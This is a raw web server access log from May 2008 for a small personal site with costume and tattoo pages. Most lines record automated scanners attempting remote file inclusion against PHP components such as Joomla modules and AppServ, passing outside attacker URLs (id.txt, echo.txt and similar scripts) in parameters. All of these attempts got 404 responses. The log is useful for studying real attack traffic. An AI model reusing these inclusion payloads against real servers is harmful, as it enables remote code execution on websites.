66.80.93.168 - - [07/May/2008:15:09:50 -0500] "GET /logs/access_log.1207785600/modules.php?name=TotalCalendar&file=index&inc_dir=http://www.autodelen.net/beelden/succes?? HTTP/1.1" 404 322 "-""libwww-perl/5.76"
66.80.93.168 - - [07/May/2008:15:09:50 -0500] "GET /modules.php?name=TotalCalendar&file=index&inc_dir=http://www.autodelen.net/beelden/succes?? HTTP/1.1" 404 295 "-""libwww-perl/5.76"
66.80.93.168 - - [07/May/2008:15:09:51 -0500] "GET /logs/modules.php?name=TotalCalendar&file=index&inc_dir=http://www.autodelen.net/beelden/succes?? HTTP/1.1" 404 300 "-""libwww-perl/5.76"
74.6.19.36 - - [07/May/2008:15:10:07 -0500] "GET /logs/access_log.1199404800 HTTP/1.0" 200 222118 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
66.80.93.168 - - [07/May/2008:15:10:10 -0500] "GET /logs/access_log.1207785600/modules.php?name=TotalCalendar&file=index&inc_dir=http://www.autodelen.net/beelden/succes?? HTTP/1.1" 404 322 "-""libwww-perl/5.76"
66.80.93.168 - - [07/May/2008:15:10:11 -0500] "GET /modules.php?name=TotalCalendar&file=index&inc_dir=http://www.autodelen.net/beelden/succes?? HTTP/1.1" 404 295 "-""libwww-perl/5.76"
66.80.93.168 - - [07/May/2008:15:10:11 -0500] "GET /logs/modules.php?name=TotalCalendar&file=index&inc_dir=http://www.autodelen.net/beelden/succes?? HTTP/1.1" 404 300 "-""libwww-perl/5.76"
213.195.220.66 - - [07/May/2008:15:10:18 -0500] "GET /costume/thmb2.htm HTTP/1.1" 200 3346 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
213.195.220.66 - - [07/May/2008:15:10:19 -0500] "GET /costume/costm13.jpg HTTP/1.1" 200 10011 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
213.195.220.66 - - [07/May/2008:15:10:19 -0500] "GET /costume/costm14.jpg HTTP/1.1" 200 10586 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
213.195.220.66 - - [07/May/2008:15:10:19 -0500] "GET /costume/costm15.jpg HTTP/1.1" 200 9724 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
213.195.220.66 - - [07/May/2008:15:10:19 -0500] "GET /costume/costm16.jpg HTTP/1.1" 200 9075 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
213.195.220.66 - - [07/May/2008:15:10:19 -0500] "GET /costume/costm17.jpg HTTP/1.1" 200 9825 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
213.195.220.66 - - [07/May/2008:15:10:19 -0500] "GET /costume/costm18.jpg HTTP/1.1" 200 9364 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
213.195.220.66 - - [07/May/2008:15:10:20 -0500] "GET /costume/costm19.jpg HTTP/1.1" 200 10555 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
213.195.220.66 - - [07/May/2008:15:10:20 -0500] "GET /costume/costm21.jpg HTTP/1.1" 200 9439 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
213.195.220.66 - - [07/May/2008:15:10:20 -0500] "GET /costume/costm20.jpg HTTP/1.1" 200 57110 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
213.195.220.66 - - [07/May/2008:15:10:20 -0500] "GET /costume/costm22.jpg HTTP/1.1" 200 9434 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
213.195.220.66 - - [07/May/2008:15:10:20 -0500] "GET /costume/costm23.jpg HTTP/1.1" 200 9858 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
213.195.220.66 - - [07/May/2008:15:10:20 -0500] "GET /costume/costm24.jpg HTTP/1.1" 200 9990 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
213.195.220.66 - - [07/May/2008:15:10:42 -0500] "GET /costume/links.htm HTTP/1.1" 200 1029 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
71.102.244.95 - - [07/May/2008:15:10:59 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://en.wikipedia.org/wiki/Flash_%28tattoo%29""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; FunWebProducts; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322; MSN 9.0;MSN 9.1; MSNbMSNI; MSNmen-us; MSNcOTH)"
71.102.244.95 - - [07/May/2008:15:10:59 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; FunWebProducts; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322; MSN 9.0;MSN 9.1; MSNbMSNI; MSNmen-us; MSNcOTH)"
71.102.244.95 - - [07/May/2008:15:10:59 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; FunWebProducts; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322; MSN 9.0;MSN 9.1; MSNbMSNI; MSNmen-us; MSNcOTH)"
202.60.74.190 - - [07/May/2008:15:11:12 -0500] "GET /logs/access_log.1181952000//faqsupport/samplefaqsupport.php?path[docroot]=http://therealtypro.net/wp-admin/images/.jpg?? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
203.146.102.175 - - [07/May/2008:15:12:33 -0500] "GET /logs/access_log.1207785600/main.php?appserv_root=http://trilbardou.free.fr/ancien/id.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.812"
203.146.102.175 - - [07/May/2008:15:12:33 -0500] "GET /main.php?appserv_root=http://trilbardou.free.fr/ancien/id.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.812"
203.146.102.175 - - [07/May/2008:15:12:34 -0500] "GET /logs/main.php?appserv_root=http://trilbardou.free.fr/ancien/id.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.812"
203.146.102.175 - - [07/May/2008:15:12:56 -0500] "GET /logs/access_log.1207180800/main.php?appserv_root=http://trilbardou.free.fr/ancien/id.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.812"
203.146.102.175 - - [07/May/2008:15:13:20 -0500] "GET /logs/access_log.1207785600/main.php?appserv_root=http://trilbardou.free.fr/ancien/id.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.812"
203.146.102.175 - - [07/May/2008:15:13:20 -0500] "GET /main.php?appserv_root=http://trilbardou.free.fr/ancien/id.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.812"
203.146.102.175 - - [07/May/2008:15:13:21 -0500] "GET /logs/main.php?appserv_root=http://trilbardou.free.fr/ancien/id.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.812"
203.146.102.175 - - [07/May/2008:15:13:39 -0500] "GET /logs/access_log.1207180800/main.php?appserv_root=http://trilbardou.free.fr/ancien/id.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.812"
85.25.145.85 - - [07/May/2008:15:15:24 -0500] "GET //admin/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.i-promo.info/test.txt? HTTP/1.1" 404 331 "-""Mozilla/4.61 (Macintosh; I; PPC)"
85.25.145.85 - - [07/May/2008:15:15:25 -0500] "GET /logs//admin/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.i-promo.info/test.txt? HTTP/1.1" 404 336 "-""Mozilla/4.61 (Macintosh; I; PPC)"
67.15.10.71 - - [07/May/2008:15:15:37 -0500] "GET /logs/access_log.1207180800/errors.php=errors=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 361 "-""libwww-perl/5.79"
67.15.10.71 - - [07/May/2008:15:15:37 -0500] "GET /errors.php=errors=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.79"
67.15.10.71 - - [07/May/2008:15:15:37 -0500] "GET /logs/errors.php=errors=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.79"
195.54.9.218 - - [07/May/2008:15:17:09 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://mfe-gay.de/safe.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.803"
217.160.203.190 - - [07/May/2008:15:18:03 -0500] "GET /logs/access_log.1207180800//ws/get_reminders.php?includedir=http://nozyk.org/rob.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
217.160.203.190 - - [07/May/2008:15:18:03 -0500] "GET //ws/get_reminders.php?includedir=http://nozyk.org/rob.txt? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
217.160.203.190 - - [07/May/2008:15:18:03 -0500] "GET /logs//ws/get_reminders.php?includedir=http://nozyk.org/rob.txt? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
93.90.176.10 - - [07/May/2008:15:19:30 -0500] "GET /logs/index1.php?x=http://statesidelogistics.com/images/sistem.txt??? HTTP/1.0" 404 287 "-""libwww-perl/5.48"
93.90.176.10 - - [07/May/2008:15:19:30 -0500] "GET /index1.php?x=http://statesidelogistics.com/images/sistem.txt??? HTTP/1.0" 404 282 "-""libwww-perl/5.48"
209.62.115.202 - - [07/May/2008:15:19:55 -0500] "GET /logs/access_log.1207180800/errors.php?error=http://www.stiri-mondene.com//id.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.811"
209.62.115.202 - - [07/May/2008:15:19:55 -0500] "GET /errors.php?error=http://www.stiri-mondene.com//id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
209.62.115.202 - - [07/May/2008:15:19:55 -0500] "GET /logs/errors.php?error=http://www.stiri-mondene.com//id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
195.155.232.37 - - [07/May/2008:15:21:04 -0500] "GET /logs/access_log.1207785600//appserv/main.php?appserv_root=http://computersvirus.t35.com/idat.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
195.155.232.37 - - [07/May/2008:15:21:05 -0500] "GET //appserv/main.php?appserv_root=http://computersvirus.t35.com/idat.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
195.155.232.37 - - [07/May/2008:15:21:05 -0500] "GET /logs//appserv/main.php?appserv_root=http://computersvirus.t35.com/idat.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
92.193.89.153 - - [07/May/2008:15:21:23 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Jakarta Commons-HttpClient/3.1"
195.155.232.37 - - [07/May/2008:15:22:05 -0500] "GET /logs/access_log.1204761600//appserv/main.php?appserv_root=http://computersvirus.t35.com/idat.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
72.29.81.233 - - [07/May/2008:15:22:41 -0500] "GET /logs/index.php?site1ftp://89.252.0.104/upload/pics/smile04.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.811"
72.29.81.233 - - [07/May/2008:15:22:42 -0500] "GET /index.php?site1ftp://89.252.0.104/upload/pics/smile04.jpg?? HTTP/1.1" 404 293 "-""libwww-perl/5.811"
72.29.81.233 - - [07/May/2008:15:23:43 -0500] "GET /logs/index.php?site1ftp://89.252.0.104/upload/pics/smile04.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.811"
72.29.81.233 - - [07/May/2008:15:23:43 -0500] "GET /index.php?site1ftp://89.252.0.104/upload/pics/smile04.jpg?? HTTP/1.1" 404 293 "-""libwww-perl/5.811"
93.90.176.10 - - [07/May/2008:15:23:51 -0500] "GET /logs/index1.php?x=http://statesidelogistics.com/images/sistem.txt??? HTTP/1.0" 404 287 "-""libwww-perl/5.48"
93.90.176.10 - - [07/May/2008:15:23:51 -0500] "GET /index1.php?x=http://statesidelogistics.com/images/sistem.txt??? HTTP/1.0" 404 282 "-""libwww-perl/5.48"
217.67.26.84 - - [07/May/2008:15:26:15 -0500] "GET /logs/index.php?site1ftp://89.252.0.104/upload/pics/smile04.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
217.67.26.84 - - [07/May/2008:15:26:15 -0500] "GET /index.php?site1ftp://89.252.0.104/upload/pics/smile04.jpg?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
72.30.179.224 - - [07/May/2008:15:28:04 -0500] "GET /logs/access_log.1157932800 HTTP/1.0" 200 363401 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
217.67.26.84 - - [07/May/2008:15:29:55 -0500] "GET /logs/index.php?site1ftp://89.252.0.104/upload/pics/smile04.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
217.67.26.84 - - [07/May/2008:15:29:55 -0500] "GET /logs/index.php?site1ftp://89.252.0.104/upload/pics/smile01.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
217.67.26.84 - - [07/May/2008:15:29:55 -0500] "GET /index.php?site1ftp://89.252.0.104/upload/pics/smile04.jpg?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
217.67.26.84 - - [07/May/2008:15:29:56 -0500] "GET /index.php?site1ftp://89.252.0.104/upload/pics/smile01.jpg?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
93.90.176.10 - - [07/May/2008:15:32:46 -0500] "GET /logs/index1.php?x=http://statesidelogistics.com/images/sistem.txt??? HTTP/1.0" 404 287 "-""libwww-perl/5.48"
93.90.176.10 - - [07/May/2008:15:32:46 -0500] "GET /index1.php?x=http://statesidelogistics.com/images/sistem.txt??? HTTP/1.0" 404 282 "-""libwww-perl/5.48"
85.92.71.151 - - [07/May/2008:15:33:18 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.onyxclub.ru/administrator/components/com_remository/idf.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.810"
85.92.71.151 - - [07/May/2008:15:33:18 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.onyxclub.ru/administrator/components/com_remository/idf.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.810"
65.55.208.131 - - [07/May/2008:15:40:01 -0500] "GET /logs/access_log.1160265600 HTTP/1.1" 200 246319 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
72.29.81.233 - - [07/May/2008:15:40:53 -0500] "GET /logs/index.php?site1ftp://89.252.0.104/upload/pics/smile04.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.811"
72.29.81.233 - - [07/May/2008:15:40:53 -0500] "GET /index.php?site1ftp://89.252.0.104/upload/pics/smile04.jpg?? HTTP/1.1" 404 293 "-""libwww-perl/5.811"
216.130.161.73 - - [07/May/2008:15:42:55 -0500] "GET /logs/access_log.1204761600//modules/vwar/admin/admin.php?vwar_root=http://www.autodelen.net/beelden/succes?? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
216.130.161.73 - - [07/May/2008:15:42:55 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.autodelen.net/beelden/succes?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
216.130.161.73 - - [07/May/2008:15:42:55 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.autodelen.net/beelden/succes?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
82.104.53.93 - - [07/May/2008:15:56:22 -0500] "GET /logs/access_log.1207180800//ws/get_reminders.php?includedir=http://admin.sitesled.com/echo.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.803"
82.104.53.93 - - [07/May/2008:15:56:24 -0500] "GET //ws/get_reminders.php?includedir=http://admin.sitesled.com/echo.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.803"
82.104.53.93 - - [07/May/2008:15:56:25 -0500] "GET /logs//ws/get_reminders.php?includedir=http://admin.sitesled.com/echo.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.803"
72.29.81.233 - - [07/May/2008:15:58:25 -0500] "GET /logs/index.php?site1ftp://89.252.0.104/upload/pics/smile04.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.811"
72.29.81.233 - - [07/May/2008:15:58:25 -0500] "GET /index.php?site1ftp://89.252.0.104/upload/pics/smile04.jpg?? HTTP/1.1" 404 293 "-""libwww-perl/5.811"
201.238.195.13 - - [07/May/2008:15:59:54 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://h1.ripway.com/injekz/id.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
201.238.195.13 - - [07/May/2008:15:59:55 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://h1.ripway.com/injekz/id.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
85.25.145.85 - - [07/May/2008:16:02:06 -0500] "GET //public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=http://www.i-promo.info/test.txt? HTTP/1.1" 404 332 "-""Mozilla/4.61 (Macintosh; I; PPC)"
85.25.145.85 - - [07/May/2008:16:02:06 -0500] "GET /logs//public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=http://www.i-promo.info/test.txt? HTTP/1.1" 404 337 "-""Mozilla/4.61 (Macintosh; I; PPC)"
84.16.224.119 - - [07/May/2008:16:04:55 -0500] "GET /logs/access_log.1207785600//skin/zero_vote/ask_password.php?dir=http://www.kulturystyka.org.pl/modules/xoopstube/images/robots.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
84.16.224.119 - - [07/May/2008:16:04:55 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.kulturystyka.org.pl/modules/xoopstube/images/robots.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.79"
84.16.224.119 - - [07/May/2008:16:04:55 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.kulturystyka.org.pl/modules/xoopstube/images/robots.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
202.60.74.190 - - [07/May/2008:16:05:15 -0500] "GET /logs/access_log.1207785600//skin/zero_vote/ask_password.php?dir=http://therealtypro.net/wp-admin/images/.jpg?? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
202.60.74.190 - - [07/May/2008:16:05:15 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://therealtypro.net/wp-admin/images/.jpg?? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
202.60.74.190 - - [07/May/2008:16:05:16 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://therealtypro.net/wp-admin/images/.jpg?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
72.36.179.98 - - [07/May/2008:16:08:52 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.810"
72.36.179.98 - - [07/May/2008:16:08:53 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.810"
62.149.209.100 - - [07/May/2008:16:10:13 -0500] "GET /logs//administrator/components/com_jreactions/langset.php?comPath=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 341 "-""libwww-perl/5.805"
62.149.209.100 - - [07/May/2008:16:10:13 -0500] "GET //administrator/components/com_jreactions/langset.php?comPath=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
72.36.179.98 - - [07/May/2008:16:10:44 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.810"
72.36.179.98 - - [07/May/2008:16:10:44 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.810"
91.90.145.19 - - [07/May/2008:16:10:52 -0500] "GET /logs//administrator/components/com_jreactions/langset.php?comPath=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 341 "-""libwww-perl/5.805"
91.90.145.19 - - [07/May/2008:16:10:52 -0500] "GET //administrator/components/com_jreactions/langset.php?comPath=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
82.104.53.93 - - [07/May/2008:16:11:37 -0500] "GET /logs/access_log.1207180800//ws/get_reminders.php?includedir=http://admin.sitesled.com/echo.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.803"
82.104.53.93 - - [07/May/2008:16:11:38 -0500] "GET //ws/get_reminders.php?includedir=http://admin.sitesled.com/echo.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.803"
82.104.53.93 - - [07/May/2008:16:11:38 -0500] "GET /logs//ws/get_reminders.php?includedir=http://admin.sitesled.com/echo.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.803"
62.149.209.100 - - [07/May/2008:16:12:24 -0500] "GET /logs//administrator/components/com_jreactions/langset.php?comPath=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 341 "-""libwww-perl/5.805"
62.149.209.100 - - [07/May/2008:16:12:24 -0500] "GET //administrator/components/com_jreactions/langset.php?comPath=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
82.104.53.93 - - [07/May/2008:16:12:40 -0500] "GET /logs/access_log.1207180800//ws/get_reminders.php?includedir=http://admin.sitesled.com/echo.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.803"
82.104.53.93 - - [07/May/2008:16:12:41 -0500] "GET //ws/get_reminders.php?includedir=http://admin.sitesled.com/echo.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.803"
82.104.53.93 - - [07/May/2008:16:12:41 -0500] "GET /logs//ws/get_reminders.php?includedir=http://admin.sitesled.com/echo.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.803"
91.90.145.19 - - [07/May/2008:16:13:02 -0500] "GET /logs//administrator/components/com_jreactions/langset.php?comPath=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 341 "-""libwww-perl/5.805"
91.90.145.19 - - [07/May/2008:16:13:03 -0500] "GET //administrator/components/com_jreactions/langset.php?comPath=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
72.36.179.98 - - [07/May/2008:16:13:04 -0500] "GET /logs//administrator/components/com_jreactions/langset.php?comPath=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 341 "-""libwww-perl/5.810"
72.36.179.98 - - [07/May/2008:16:13:05 -0500] "GET //administrator/components/com_jreactions/langset.php?comPath=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.810"
74.6.7.181 - - [07/May/2008:16:16:12 -0500] "GET /logs/access_log.1205366400 HTTP/1.0" 200 266827 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
89.149.208.203 - - [07/May/2008:16:16:43 -0500] "GET /logs/access_log.1207785600//skin/zero_vote/ask_password.php?dir=http://therealtypro.net/wp-admin/images/.jpg?? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
89.149.208.203 - - [07/May/2008:16:16:43 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://therealtypro.net/wp-admin/images/.jpg?? HTTP/1.1" 404 316 "-""libwww-perl/5.79"
89.149.208.203 - - [07/May/2008:16:16:43 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://therealtypro.net/wp-admin/images/.jpg?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
66.249.67.199 - - [07/May/2008:16:20:24 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.67.199 - - [07/May/2008:16:20:24 -0500] "GET /costume/thmb9.htm HTTP/1.1" 200 2155 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
72.36.179.98 - - [07/May/2008:16:22:18 -0500] "GET /logs/p/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 335 "-""libwww-perl/5.810"
72.36.179.98 - - [07/May/2008:16:22:18 -0500] "GET /p/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 330 "-""libwww-perl/5.810"
196.40.71.237 - - [07/May/2008:16:22:29 -0500] "GET /logs//administrator/components/com_jreactions/langset.php?comPath=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 341 "-""libwww-perl/5.69"
196.40.71.237 - - [07/May/2008:16:22:29 -0500] "GET //administrator/components/com_jreactions/langset.php?comPath=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.69"
72.36.179.98 - - [07/May/2008:16:22:37 -0500] "GET /logs/p/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 335 "-""libwww-perl/5.810"
72.36.179.98 - - [07/May/2008:16:22:38 -0500] "GET /p/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 330 "-""libwww-perl/5.810"
196.40.71.237 - - [07/May/2008:16:26:48 -0500] "GET /logs//administrator/components/com_jreactions/langset.php?comPath=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 341 "-""libwww-perl/5.69"
196.40.71.237 - - [07/May/2008:16:26:48 -0500] "GET //administrator/components/com_jreactions/langset.php?comPath=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.69"
70.97.148.190 - - [07/May/2008:16:29:17 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://en.wikipedia.org/wiki/Flash_%28tattoo%29""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
70.97.148.190 - - [07/May/2008:16:29:18 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
70.97.148.190 - - [07/May/2008:16:29:18 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
70.97.148.190 - - [07/May/2008:16:29:26 -0500] "GET /tattoo/tatsymbl.htm HTTP/1.1" 200 3085 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
70.97.148.190 - - [07/May/2008:16:29:54 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 2378 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
70.97.148.190 - - [07/May/2008:16:29:54 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
